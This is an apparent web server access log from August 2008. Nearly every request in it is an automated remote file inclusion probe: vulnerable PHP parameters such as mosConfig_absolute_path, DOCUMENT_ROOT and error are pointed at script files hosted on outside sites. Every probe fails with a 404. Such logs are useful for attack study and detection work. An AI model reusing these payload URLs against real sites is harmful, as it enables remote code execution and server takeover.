139.146.145.67 - - [21/Aug/2008:05:46:47 -0700] "GET /logs/!rfihttp://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:05:48:49 -0700] "GET /logs/errors.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:05:48:49 -0700] "GET /errors.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:05:49:08 -0700] "GET /logs/access_080731.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:05:49:08 -0700] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:05:49:08 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
87.226.77.5 - - [21/Aug/2008:05:49:29 -0700] "GET //index.php?p=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
201.130.79.130 - - [21/Aug/2008:05:49:32 -0700] "GET /logs/access.log/common/db.php?commonpath=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.130.79.130 - - [21/Aug/2008:05:49:32 -0700] "GET /common/db.php?commonpath=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.130.79.130 - - [21/Aug/2008:05:49:32 -0700] "GET /logs/common/db.php?commonpath=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
87.226.77.5 - - [21/Aug/2008:05:49:34 -0700] "GET //index.php?p=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
208.83.209.18 - - [21/Aug/2008:05:50:03 -0700] "GET /logs/common/db.php?commonpath=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
208.83.209.18 - - [21/Aug/2008:05:50:03 -0700] "GET /logs/access.log/common/db.php?commonpath=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
208.83.209.18 - - [21/Aug/2008:05:50:06 -0700] "GET /common/db.php?commonpath=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
139.146.145.67 - - [21/Aug/2008:05:50:24 -0700] "GET /logs/access.log//mailaccess/pop3.php?CONFIG[pear_dir]=http://verinet.com.tr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
87.226.77.5 - - [21/Aug/2008:05:50:56 -0700] "GET /logs/access_080731.log//index.php?p=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
87.226.77.5 - - [21/Aug/2008:05:50:57 -0700] "GET //index.php?p=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
87.226.77.5 - - [21/Aug/2008:05:50:58 -0700] "GET /logs//index.php?p=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
88.191.62.117 - - [21/Aug/2008:05:51:02 -0700] "GET /logs/access_080729.log//index.php?show=http://jonclan.vndv.com/id/vid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
88.191.62.117 - - [21/Aug/2008:05:51:13 -0700] "GET /logs/access_080729.log//?p=http://jonclan.vndv.com/id/vid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
88.191.62.117 - - [21/Aug/2008:05:52:47 -0700] "GET /logs/access_080731.log%20//index.php?show=http://jonclan.vndv.com/id/vid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
74.55.136.66 - - [21/Aug/2008:05:53:11 -0700] "GET /logs/access_080731.log/error.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
74.55.136.66 - - [21/Aug/2008:05:53:12 -0700] "GET /error.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
74.55.136.66 - - [21/Aug/2008:05:53:12 -0700] "GET /logs/error.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
88.191.62.117 - - [21/Aug/2008:05:53:13 -0700] "GET /logs/access_080731.log%20//?p=http://jonclan.vndv.com/id/vid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
74.6.8.89 - - [21/Aug/2008:05:53:33 -0700] "GET /logs/access_080513.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.heyhovies.com"
87.226.77.5 - - [21/Aug/2008:05:53:55 -0700] "GET /php?we_objectID=http://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
87.226.77.5 - - [21/Aug/2008:05:53:55 -0700] "GET /logs/php?we_objectID=http://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
87.226.77.5 - - [21/Aug/2008:05:53:56 -0700] "GET /logs/access_080804.log/php?we_objectID=http://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
87.226.77.5 - - [21/Aug/2008:05:54:00 -0700] "GET /logs/access.log/php?we_objectID=http://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
86.58.154.237 - - [21/Aug/2008:05:54:01 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
87.226.77.5 - - [21/Aug/2008:05:54:05 -0700] "GET //index.php?p=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:05:54:26 -0700] "GET /logs/access_080815.log/error.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:05:54:26 -0700] "GET /error.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:05:54:26 -0700] "GET /logs/error.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:05:54:29 -0700] "GET /logs/access_080809.log/errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:05:54:33 -0700] "GET /errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:05:54:38 -0700] "GET /logs/errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
87.226.77.5 - - [21/Aug/2008:05:54:39 -0700] "GET //index.php?p=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:05:54:53 -0700] "GET /logs/access_080813.log//advanced/advanced1.php?pluginpath[0]=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:05:54:54 -0700] "GET //advanced/advanced1.php?pluginpath[0]=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:05:54:55 -0700] "GET /logs//advanced/advanced1.php?pluginpath[0]=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
62.212.130.170 - - [21/Aug/2008:05:57:18 -0700] "GET /errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.heyhovies.com"
62.212.130.170 - - [21/Aug/2008:05:57:18 -0700] "GET /logs/errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.heyhovies.com"
91.84.19.133 - - [21/Aug/2008:05:57:45 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
74.55.109.34 - - [21/Aug/2008:05:57:49 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
92.48.98.6 - - [21/Aug/2008:05:57:49 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
74.55.109.34 - - [21/Aug/2008:05:57:49 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
92.48.98.6 - - [21/Aug/2008:05:57:50 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
74.55.109.34 - - [21/Aug/2008:05:57:50 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
92.48.98.6 - - [21/Aug/2008:05:57:50 -0700] "GET //index.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
92.48.98.6 - - [21/Aug/2008:05:57:50 -0700] "GET //index.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
92.48.98.6 - - [21/Aug/2008:05:57:50 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
92.48.98.6 - - [21/Aug/2008:05:57:50 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
87.106.212.108 - - [21/Aug/2008:05:57:52 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
87.106.212.108 - - [21/Aug/2008:05:57:52 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
87.106.212.108 - - [21/Aug/2008:05:57:52 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
87.106.212.108 - - [21/Aug/2008:05:57:52 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
87.106.212.108 - - [21/Aug/2008:05:57:52 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
87.106.212.108 - - [21/Aug/2008:05:57:52 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
89.249.18.10 - - [21/Aug/2008:05:58:01 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
89.249.18.10 - - [21/Aug/2008:05:58:01 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
89.249.18.10 - - [21/Aug/2008:05:58:01 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
89.249.18.10 - - [21/Aug/2008:05:58:01 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
89.249.18.10 - - [21/Aug/2008:05:58:02 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
89.249.18.10 - - [21/Aug/2008:05:58:02 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
77.221.130.15 - - [21/Aug/2008:05:58:10 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
77.221.130.15 - - [21/Aug/2008:05:58:10 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
77.221.130.15 - - [21/Aug/2008:05:58:11 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
213.171.218.166 - - [21/Aug/2008:05:58:34 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.heyhovies.com"
213.171.218.166 - - [21/Aug/2008:05:58:34 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.heyhovies.com"
213.171.218.166 - - [21/Aug/2008:05:58:34 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.heyhovies.com"
213.171.218.166 - - [21/Aug/2008:05:58:34 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.heyhovies.com"
213.171.218.166 - - [21/Aug/2008:05:58:35 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.heyhovies.com"
213.171.218.166 - - [21/Aug/2008:05:58:35 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.heyhovies.com"
74.55.109.34 - - [21/Aug/2008:05:58:41 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
74.55.109.34 - - [21/Aug/2008:05:58:42 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
74.55.109.34 - - [21/Aug/2008:05:58:42 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
74.55.109.34 - - [21/Aug/2008:05:58:44 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
74.55.109.34 - - [21/Aug/2008:05:58:44 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
74.55.109.34 - - [21/Aug/2008:05:58:45 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
92.48.98.6 - - [21/Aug/2008:05:58:47 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
92.48.98.6 - - [21/Aug/2008:05:58:47 -0700] "GET //index.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
92.48.98.6 - - [21/Aug/2008:05:58:47 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
64.13.225.31 - - [21/Aug/2008:05:59:19 -0700] "GET /logs/access.log//index.php?INCLUDE_FOLDER=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
64.13.225.31 - - [21/Aug/2008:05:59:24 -0700] "GET //index.php?INCLUDE_FOLDER=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
89.249.18.10 - - [21/Aug/2008:05:59:26 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
89.249.18.10 - - [21/Aug/2008:05:59:26 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
89.249.18.10 - - [21/Aug/2008:05:59:26 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
213.171.218.166 - - [21/Aug/2008:05:59:41 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.heyhovies.com"
213.171.218.166 - - [21/Aug/2008:05:59:41 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.heyhovies.com"
213.171.218.166 - - [21/Aug/2008:05:59:41 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.heyhovies.com"
64.13.225.31 - - [21/Aug/2008:05:59:42 -0700] "GET /logs//index.php?INCLUDE_FOLDER=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
74.202.49.162 - - [21/Aug/2008:05:59:46 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
74.202.49.162 - - [21/Aug/2008:05:59:47 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
74.202.49.162 - - [21/Aug/2008:05:59:47 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
74.202.49.162 - - [21/Aug/2008:05:59:53 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
74.202.49.162 - - [21/Aug/2008:05:59:54 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
74.202.49.162 - - [21/Aug/2008:05:59:54 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:06:00:47 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:06:00:47 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:06:00:47 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:06:02:41 -0700] "GET /logs/access.log/errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
74.6.8.89 - - [21/Aug/2008:06:03:53 -0700] "GET /logs/access.log HTTP/1.0" 200 45574 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.heyhovies.com"
74.202.49.162 - - [21/Aug/2008:06:04:34 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
74.202.49.162 - - [21/Aug/2008:06:04:34 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
74.202.49.162 - - [21/Aug/2008:06:04:34 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:06:04:52 -0700] "GET /logs/access_080804.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
81.169.137.253 - - [21/Aug/2008:06:07:05 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
81.169.137.253 - - [21/Aug/2008:06:07:05 -0700] "GET /logs/access_080724.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
81.169.137.253 - - [21/Aug/2008:06:07:05 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
81.169.137.253 - - [21/Aug/2008:06:07:17 -0700] "GET /logs/access_080815.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
87.226.77.5 - - [21/Aug/2008:06:07:42 -0700] "GET /logs/access_080729.log//index.php?p=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
81.169.137.253 - - [21/Aug/2008:06:08:05 -0700] "GET /logs/scripts.log//admin/classes/TplLoad.php?full_path_to_public_program=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
81.169.137.253 - - [21/Aug/2008:06:08:06 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
81.169.137.253 - - [21/Aug/2008:06:08:06 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
81.169.137.253 - - [21/Aug/2008:06:08:20 -0700] "GET /logs/access_080815.log//admin/classes/TplLoad.php?full_path_to_public_program=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
81.169.137.253 - - [21/Aug/2008:06:08:29 -0700] "GET /logs/access_080731.log//admin/business_inc/saveserver.php?thisdir=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
81.169.137.253 - - [21/Aug/2008:06:08:30 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
74.6.8.89 - - [21/Aug/2008:06:08:30 -0700] "GET /logs/access_071228.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.heyhovies.com"
81.169.137.253 - - [21/Aug/2008:06:08:33 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
69.210.185.1 - - [21/Aug/2008:06:08:43 -0700] "GET /logs/access.log//index.php?INCLUDE_FOLDER=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.210.185.1 - - [21/Aug/2008:06:08:48 -0700] "GET /logs//index.php?INCLUDE_FOLDER=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
69.210.185.1 - - [21/Aug/2008:06:08:49 -0700] "GET /logs/access.log//index.php?INCLUDE_FOLDER=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
